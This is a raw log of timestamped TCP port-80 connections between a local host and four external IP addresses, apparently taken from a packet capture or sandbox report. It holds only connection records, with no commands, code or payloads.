                                  Jul 5, 2024 08:01:53.970855951 CEST4978580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:53.975727081 CEST804978554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:54.699453115 CEST804978554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:54.699523926 CEST4978580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:54.699652910 CEST804978554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:54.699711084 CEST4978580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:54.702585936 CEST4978580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:54.705138922 CEST4978680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:54.707813025 CEST804978554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:54.710012913 CEST804978644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:54.710087061 CEST4978680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:54.711893082 CEST4978680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:54.716692924 CEST804978644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:55.235208988 CEST804978644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:55.235228062 CEST804978644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:55.235290051 CEST4978680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:55.235290051 CEST4978680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:55.246752024 CEST4978680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:55.253092051 CEST804978644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:55.284739017 CEST4978780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:55.289643049 CEST804978744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:55.289702892 CEST4978780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:55.289827108 CEST4978780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:55.294565916 CEST804978744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:55.793145895 CEST804978744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:55.793215990 CEST4978780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:55.793250084 CEST804978744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:55.793303967 CEST4978780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:55.793831110 CEST4978780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:55.798310041 CEST4978380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:55.798935890 CEST4978880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:55.802053928 CEST804978744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:55.807137966 CEST804978878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:55.807296991 CEST4978880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:55.807300091 CEST804978378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:55.807476997 CEST4978380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:55.807713985 CEST4978880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:55.815783978 CEST804978878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:56.487795115 CEST804978878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:56.487853050 CEST4978880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:56.500796080 CEST4978480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:56.501100063 CEST4978980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:56.505969048 CEST804978937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:56.506052017 CEST4978980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:56.506242990 CEST4978980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:56.506355047 CEST804978437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:56.506409883 CEST4978480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:56.510998011 CEST804978937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:57.243016005 CEST804978937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:57.243076086 CEST4978980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:57.253026009 CEST4978980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:57.258061886 CEST804978937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:57.479799032 CEST804978937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:01:57.479866982 CEST4978980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:01:57.811321974 CEST4979080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:57.816174984 CEST804979054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:57.816234112 CEST4979080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:57.818702936 CEST4979080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:57.823502064 CEST804979054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:58.561428070 CEST804979054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:58.561456919 CEST804979054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:58.561486006 CEST4979080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:58.561559916 CEST4979080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:58.574522018 CEST4979080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:01:58.579417944 CEST804979054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:01:58.582130909 CEST4979180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:58.587625980 CEST804979144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:58.587692976 CEST4979180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:58.613466978 CEST4979180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:58.622200012 CEST804979144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:59.120666981 CEST804979144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:59.120759010 CEST804979144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:59.120824099 CEST4979180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:59.138036966 CEST4979180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:59.144005060 CEST804979144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:59.151737928 CEST4979280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:59.156626940 CEST804979244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:59.156698942 CEST4979280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:59.156855106 CEST4979280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:59.162064075 CEST804979244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:59.672311068 CEST804979244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:59.672327995 CEST804979244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:59.672379017 CEST4979280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:59.673222065 CEST4979280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:01:59.678221941 CEST804979244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:01:59.925306082 CEST4978880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:59.925636053 CEST4979380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:59.930516005 CEST804979378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:59.930643082 CEST4979380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:59.930689096 CEST804978878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:01:59.930748940 CEST4978880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:59.943341017 CEST4979380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:01:59.948196888 CEST804979378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:00.599065065 CEST804979378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:00.599117041 CEST4979380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:00.623392105 CEST4978980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:00.623724937 CEST4979480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:00.628621101 CEST804979437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:00.628684044 CEST804978937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:00.628689051 CEST4979480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:00.628746033 CEST4978980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:00.629569054 CEST4979480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:00.634504080 CEST804979437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:01.362121105 CEST804979437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:01.362196922 CEST4979480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:01.363594055 CEST4979480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:01.368690968 CEST804979437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:01.589080095 CEST804979437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:01.589129925 CEST4979480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:01.712407112 CEST4979580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:01.717366934 CEST804979554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:01.719516039 CEST4979580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:01.719700098 CEST4979580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:01.724442005 CEST804979554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:02.547447920 CEST804979554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:02.547476053 CEST804979554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:02.547486067 CEST804979554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:02.547530890 CEST4979580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:02.547569990 CEST4979580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:02.563374043 CEST4979580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:02.565290928 CEST4979680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:02.568268061 CEST804979554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:02.570221901 CEST804979644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:02.570293903 CEST4979680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:02.576487064 CEST4979680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:02.581299067 CEST804979644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:03.061033010 CEST804979644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:03.061053991 CEST804979644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:03.061115026 CEST4979680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:03.061177015 CEST4979680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:03.081000090 CEST4979680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:03.085886955 CEST804979644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:03.145008087 CEST4979780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:03.149987936 CEST804979744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:03.150156021 CEST4979780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:03.152790070 CEST4979780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:03.158058882 CEST804979744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:03.652888060 CEST804979744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:03.653152943 CEST4979780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:03.653333902 CEST804979744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:03.653402090 CEST4979780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:03.654416084 CEST4979780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:03.659713030 CEST804979744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:03.661808014 CEST4979380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:03.662079096 CEST4979880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:03.666977882 CEST804979878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:03.667071104 CEST4979880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:03.667135000 CEST804979378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:03.667201996 CEST4979380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:03.667335987 CEST4979880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:03.672529936 CEST804979878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:04.362694979 CEST804979878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:04.362744093 CEST4979880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:04.394167900 CEST4979480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:04.394710064 CEST4979980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:04.399535894 CEST804979437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:04.399563074 CEST804979937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:04.399620056 CEST4979480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:04.399663925 CEST4979980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:04.401245117 CEST4979980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:04.406444073 CEST804979937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:05.122004032 CEST804979937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:05.122076988 CEST4979980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:05.144130945 CEST4979980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:05.149262905 CEST804979937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:05.367907047 CEST804979937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:05.368058920 CEST4979980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:05.512810946 CEST4980080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:05.517776966 CEST804980054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:05.517853975 CEST4980080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:05.518066883 CEST4980080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:05.523709059 CEST804980054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:06.248229027 CEST804980054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:06.248254061 CEST804980054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:06.248286963 CEST4980080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:06.248347998 CEST4980080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:06.249200106 CEST4980080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:06.252496958 CEST4980180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:06.253927946 CEST804980054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:06.258023977 CEST804980144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:06.258095026 CEST4980180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:06.282663107 CEST4980180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:06.288780928 CEST804980144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:06.771897078 CEST804980144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:06.771919012 CEST804980144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:06.771949053 CEST4980180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:06.772027016 CEST4980180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:06.772814989 CEST4980180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:06.777642965 CEST804980144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:06.796587944 CEST4980280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:06.801449060 CEST804980244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:06.801575899 CEST4980280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:06.807492971 CEST4980280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:06.816737890 CEST804980244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:07.301615000 CEST804980244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:07.301676989 CEST804980244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:07.301693916 CEST4980280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:07.301739931 CEST4980280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:07.315491915 CEST4980280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:07.317188025 CEST4979880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:07.317568064 CEST4980380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:07.320487022 CEST804980244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:07.322362900 CEST804979878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:07.322375059 CEST804980378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:07.322436094 CEST4979880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:07.322540998 CEST4980380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:07.323810101 CEST4980380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:07.328742027 CEST804980378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:07.997956038 CEST804980378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:07.999572039 CEST4980380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:08.029134989 CEST4979980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:08.029524088 CEST4980480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:08.034240007 CEST804979937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:08.034301996 CEST4979980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:08.034344912 CEST804980437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:08.034420013 CEST4980480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:08.035151005 CEST4980480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:08.039918900 CEST804980437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:08.760024071 CEST804980437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:08.760122061 CEST4980480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:08.763052940 CEST4980480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:08.767929077 CEST804980437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:08.985199928 CEST804980437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:08.985491037 CEST4980480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:09.122103930 CEST4980580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:09.126900911 CEST804980554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:09.127634048 CEST4980580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:09.128118992 CEST4980580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:09.132896900 CEST804980554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:09.966772079 CEST804980554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:09.966840982 CEST4980580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:09.966947079 CEST804980554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:09.967009068 CEST4980580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:09.972762108 CEST4980580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:09.977585077 CEST804980554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:09.985466003 CEST4980680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:09.990396976 CEST804980644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:09.990516901 CEST4980680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:09.991240025 CEST4980680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:09.996068954 CEST804980644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:10.486390114 CEST804980644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:10.486444950 CEST4980680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:10.486521959 CEST804980644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:10.486572027 CEST4980680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:10.487301111 CEST4980680192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:10.492053986 CEST804980644.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:10.536478043 CEST4980780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:10.544962883 CEST804980744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:10.545032024 CEST4980780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:10.546094894 CEST4980780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:10.553822041 CEST804980744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:11.034728050 CEST804980744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:11.034934998 CEST804980744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:11.035475969 CEST4980780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:11.119515896 CEST4980780192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:11.127829075 CEST804980744.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:11.161185980 CEST4980380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:11.161601067 CEST4980880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:11.166415930 CEST804980878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:11.166510105 CEST4980880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:11.166863918 CEST804980378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:11.167100906 CEST4980880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:11.167227030 CEST4980380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:11.171823978 CEST804980878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:11.842875004 CEST804980878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:11.842926979 CEST4980880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:11.858591080 CEST4980480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:11.858961105 CEST4980980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:11.863745928 CEST804980437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:11.863759995 CEST804980937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:11.863810062 CEST4980480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:11.863842010 CEST4980980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:11.864140034 CEST4980980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:11.868944883 CEST804980937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:12.586895943 CEST804980937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:12.586970091 CEST4980980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:12.588943958 CEST4980980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:12.594474077 CEST804980937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:12.811820030 CEST804980937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:12.812371016 CEST4980980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:12.964730024 CEST4981080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:12.969749928 CEST804981054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:12.969916105 CEST4981080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:12.970118999 CEST4981080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:12.974970102 CEST804981054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:12.976214886 CEST4980980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:12.976295948 CEST4980880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:12.981573105 CEST804980937.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:12.981760025 CEST4980980192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:12.982332945 CEST804980878.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:12.983542919 CEST4980880192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:13.700014114 CEST804981054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:13.700092077 CEST4981080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:13.700112104 CEST804981054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:13.700231075 CEST4981080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:13.738385916 CEST4981080192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:13.744007111 CEST4981180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:13.745534897 CEST804981054.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:13.749433994 CEST804981144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:13.749510050 CEST4981180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:13.749687910 CEST4981180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:13.754573107 CEST804981144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:14.238537073 CEST804981144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:14.238567114 CEST804981144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:14.238624096 CEST4981180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:14.238624096 CEST4981180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:14.239794016 CEST4981180192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:14.244576931 CEST804981144.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:14.254106998 CEST4981280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:14.258924961 CEST804981244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:14.259037018 CEST4981280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:14.259538889 CEST4981280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:14.264326096 CEST804981244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:14.757560015 CEST804981244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:14.757677078 CEST4981280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:14.757730007 CEST804981244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:14.757863045 CEST4981280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:14.783503056 CEST4981280192.168.2.944.221.84.105
                                  Jul 5, 2024 08:02:14.787501097 CEST4981380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:14.788460016 CEST804981244.221.84.105192.168.2.9
                                  Jul 5, 2024 08:02:14.792406082 CEST804981378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:14.792551041 CEST4981380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:14.792678118 CEST4981380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:14.797480106 CEST804981378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:15.639409065 CEST804981378.46.2.155192.168.2.9
                                  Jul 5, 2024 08:02:15.639581919 CEST4981380192.168.2.978.46.2.155
                                  Jul 5, 2024 08:02:15.701251030 CEST4981480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:15.706201077 CEST804981437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:15.706265926 CEST4981480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:15.707665920 CEST4981480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:15.712526083 CEST804981437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:16.444581032 CEST804981437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:16.444652081 CEST4981480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:16.475994110 CEST4981480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:16.480901957 CEST804981437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:16.705194950 CEST804981437.230.104.89192.168.2.9
                                  Jul 5, 2024 08:02:16.707612038 CEST4981480192.168.2.937.230.104.89
                                  Jul 5, 2024 08:02:16.886789083 CEST4981580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:16.891819954 CEST804981554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:16.891930103 CEST4981580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:16.892206907 CEST4981580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:16.896971941 CEST804981554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:17.630115986 CEST804981554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:17.630456924 CEST804981554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:17.630578041 CEST4981580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:17.647526026 CEST4981580192.168.2.954.244.188.177
                                  Jul 5, 2024 08:02:17.652744055 CEST804981554.244.188.177192.168.2.9
                                  Jul 5, 2024 08:02:17.662185907 CEST4981680192.168.2.944.221.84.105
